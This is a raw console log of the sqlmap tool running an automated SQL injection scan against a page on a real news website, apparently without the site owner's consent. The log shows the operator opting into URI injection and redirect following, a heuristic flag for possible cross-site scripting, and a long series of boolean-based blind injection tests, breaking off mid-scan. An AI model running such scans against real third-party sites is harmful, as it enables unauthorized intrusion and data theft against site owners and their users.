http://www.taipeitimes.com/News/worldbiz/archives/2004/09/24/2003204178
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.3.8.13#dev}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:30:38 /2019-09-07/

[?1049h[22;0;0t[1;24r(B[m[4l[?7h[24;1H[?1049l[23;0;0t[?1l>[12:30:38] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1' from file '/root/sqlmap/data/txt/user-agents.txt'
[12:30:39] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[12:30:39] [INFO] testing connection to the target URL
[12:30:40] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:30:40] [INFO] testing if the target URL content is stable
[12:30:41] [INFO] target URL content is stable
[12:30:41] [INFO] testing if URI parameter '#1*' is dynamic
sqlmap got a 302 redirect to 'http://www.taipeitimes.com:80/News/unknown'. Do you want to follow? [Y/n] Y
[12:30:41] [INFO] URI parameter '#1*' appears to be dynamic
[12:30:41] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[12:30:41] [INFO] heuristic (XSS) test shows that URI parameter '#1*' might be vulnerable to cross-site scripting (XSS) attacks
[12:30:41] [INFO] testing for SQL injection on URI parameter '#1*'
[12:30:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:30:42] [WARNING] reflective value(s) found and filtering out
[12:31:11] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[12:31:28] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[12:31:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[12:31:52] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[12:31:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[12:31:58] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (comment)'
[12:31:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - comment)'
[12:32:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[12:32:10] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[12:32:20] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[12:32:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[12:32:31] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[12:32:34] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[12:32:45] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[12:33:00] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
